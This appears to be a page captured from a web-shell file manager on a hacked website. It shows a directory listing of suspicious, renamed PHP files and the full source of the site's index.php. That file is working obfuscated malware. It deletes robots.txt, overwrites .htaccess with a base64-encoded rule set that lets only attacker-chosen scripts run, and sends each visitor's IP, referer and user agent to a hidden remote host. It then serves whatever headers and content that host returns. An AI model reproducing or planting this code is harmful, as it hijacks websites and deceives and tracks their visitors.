Submit
Path:
~
/
home
/
ampckwxt
/
james-sherwood.com
/
File Content:
index.php
<?php function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYzOTMtY2g0LXYzMDAucmFrdXRlbjI0anAuY2xpY2s='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
.well-known__da94192
---
0755
168931
---
0755
240972__da94192
---
0755
cgi-bin__da94192
---
0755
common__da94192
---
0755
diary__da94192
---
0644
images__da94192
---
0644
lib__da94192
---
0644
ova__da94192
---
0755
wp-admin__da94192
---
0644
wp-content__da94192
---
0644
wp-includes__da94192
---
0644
.htaccess
498 bytes
0644
.htaccess.bak__da94192
793 bytes
0644
.htaccess_file_editor__da94192
1393 bytes
0644
.htaccess_live__da94192
1283 bytes
0644
about.php
13344 bytes
0644
archive.html__da94192
19253 bytes
0644
books.html__da94192
670 bytes
0644
comfunctions.php__da94192
6125 bytes
0644
contact.html__da94192
670 bytes
0644
diary.html__da94192
55097 bytes
0644
editorial.html__da94192
670 bytes
0644
error_log__da94192
13171916 bytes
0644
exhibitions.html__da94192
8205 bytes
0644
files_count.xml__da94192
1199 bytes
0644
florence.html__da94192
670 bytes
0644
fyqrbasi.php__da94192
15114 bytes
0644
header.php__da94192
12483 bytes
0644
hry.txt__da94192
1 bytes
0644
index.html__da94192
11082 bytes
0644
index.php
2712 bytes
0644
index.php.bak__da94192
14689 bytes
0644
index.php__da94192
2712 bytes
0644
index_php.html__da94192
670 bytes
0644
inputs.php__da94192
127 bytes
0644
james-sherwood.com_marketingcuan2_gmail.com_idgaclxawq_backup.zip__da94192
5526498 bytes
0644
menu.php__da94192
95 bytes
0644
nginx.txt__da94192
612 bytes
0644
paris.html__da94192
670 bytes
0644
php.ini__da94192
40 bytes
0644
postnews.php
5464 bytes
0444
postnews.php__da94192
6059 bytes
0644
robots.txt__da94192
1196 bytes
0644
swuqgpwm.php__da94192
19984 bytes
0644
tokyo.html__da94192
670 bytes
0644
tool.php__da94192
39701 bytes
0644
txets.php
5298 bytes
0444
video.html__da94192
670 bytes
0644
wdustvsh.php__da94192
15114 bytes
0644
wp-blog-header.php
3167 bytes
0644
wp-blog-header.php__da94192
1824 bytes
0644
wp-confiq.php__da94192
39701 bytes
0644
wp-cron.php
2796 bytes
0644
wwwroot.txt__da94192
33 bytes
0644
N4ST4R_ID | Naxtarrr